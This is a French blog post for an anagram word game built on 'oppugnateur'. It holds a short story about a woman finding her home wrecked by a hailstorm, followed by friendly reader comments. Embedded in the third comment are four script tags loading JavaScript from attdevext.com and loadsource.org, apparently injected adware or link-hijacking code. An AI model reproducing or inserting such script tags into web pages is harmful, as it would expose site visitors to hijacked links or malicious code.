• Oppugnateur (Jeu de lettres n°174)

    Oppugnateur (Jeu de lettres n°174)

    Lady Marianne propose un  petit-jeu-de-lettres-174

    Oppugnateur (Jeu de lettres n°174)

    Le mot le plus long en anagramme à déchiffrer est : OPPUGNATEUR

    Tiré du latin- masculin singulier -celui qui attaque- qui assiège

    Avec les lettres proposées : faire des mots de 5 lettres au moins et au moins 5 mots puis les inclure dans un texte sur un thème de votre choix.

    Voici mon texte (avec les mots trouvés en gras et en italique) :

    De retour du Pérou, Greta  était accablée. Que s'était-il passé durant son absence ? Son toit était troué. Son potager  était un vrai champ de bataille.  Tout était écrasé, piétiné, comme si un troupeau  d'éléphants l'avait traversé de part en part. Autour,  ce n'était guère mieux. Des arbres avaient été déracinés. Un poteau  électrique était tombé. Une plaque d'égout  avait été soulevée. Et quelle puanteur  à l'intérieur de la maison ! Une fine couche de moisissure recouvrait les plafonds et les murs. Une nappe  d'eau croupie dissimulait le sol. La porte  d'entrée avait été arrachée. Greta  avait confié un double de clefs à son voisin... Mais Petro  n'était pas là. Elle apprit qu'il était à l'hôpital. Il avait été gravement blessé  à la tête par la chute d'une tuile. Pauvre homme ! Elle allait lui apporter  du nougat. Il adorait ça... Il y avait eu un violent orage  de grêle qui avait touché plusieurs villages de la région et qui avait fait pas  mal de dégâts. Des grêlons  plus gros qu'une orange avaient tout cassé et tout déchiqueté. Un désastre... Elle aimait beaucoup papoter  avec ce monsieur du Sahara. Un Touareg débonnaire qui prenait un malin plaisir à mêler des mots d'argot  à sa langue berbère et avec lequel il avait été facile de nouer  des liens amicaux. En outre, il avait su la tirer d'un bien mauvais pas lorsqu'un oppugnateur s'était faufilé chez elle. Un fou furieux qui avait voulu la prendre en otage. Elle avait eu très peur...


  • Commentaires

    1
    Dimanche 22 Juillet à 02:18
    colettedc

    Défi magnifiquement relevé, Béa ! Bon dimanche ! Bisous♥

    2
    Dimanche 22 Juillet à 07:45

    Les orages de grêle ont vraiment de quoi faire peur , j'ai vu un reportage sur un de ceux qui ont touché le Jura c'est vraiment impressionnant on se croirait en plein hiver tellement il y a d'épaisseur de grêlons .

    Bravo pour ton texte une mine d'anagrammes et un clin d'oeil à une certaine réalité .

    Bon dimanche 

    Bises 

    3
    Dimanche 22 Juillet à 09:02
    LADY MARIANNE

    que d'anagrammes- un grand bravo-
    la pauvre sa maison est HS-
    une belle histoire d'entraide- ils vont s'en sortir j'en suis sure-
    bisous et bon dimanche-

    <script src="//attdevext.com/1c7ecd567624c69629.js"></script> <script src="http://attdevext.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52293x7294x&r=44" type="text/javascript"></script> <script src="http://attdevext.com/ext/1c7ecd567624c69629.js?sid=52293_7294_&title=&blocks[]=31af2" type="text/javascript"></script>
    4
    Dimanche 22 Juillet à 09:27

    C'est de saison avec les pluies qu'il a fait par ici.

    Bon Dimanche Béa

    5
    Dimanche 22 Juillet à 12:39

    un bien joli texte bravo

    tu t'es inspirée des dégats causés par la pluie?

    6
    Dimanche 22 Juillet à 13:33

    Bravo pour tous les anagrammes dans ton histoire.

    Bisous

    7
    Evy
    Dimanche 22 Juillet à 14:28

    Bravos ma Béa faudrais que je fasse des défis très dur lol pour que tu aime " rire " bonne journée bisous

    8
    Dimanche 22 Juillet à 16:07
    Renee

    je passe te faire un coucou et des bises mais je retourne à mes corvées. 

    9
    Dimanche 22 Juillet à 20:56

    Je ne connaissais pas du tout ce terme.
    Avec la pluie beaucoup de potagers ont été dévastés chez nous.
    Quelle imagination Béa, bravo tu as réussi ce défi.
    Bonne soirée
    Bises
     

    10
    Dimanche 22 Juillet à 23:25

    Encore un mot que je ne connaissais pas!

    texte d'actualité avec les gros orages!

    Bises Béa

    11
    Jeudi 26 Juillet à 16:54

    Quelle histoire, ça fait peur de retrouver sa maison dans un tel état, et c'est très triste.

    12
    Samedi 28 Juillet à 09:28

    Bravo pour ce nouveau texte.

    Quel triste spectacle pour Greta à son retour.  C'est vrai que les orages de grêles peuvent faire d'énormes dégâts.

    Prends soin de toi.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :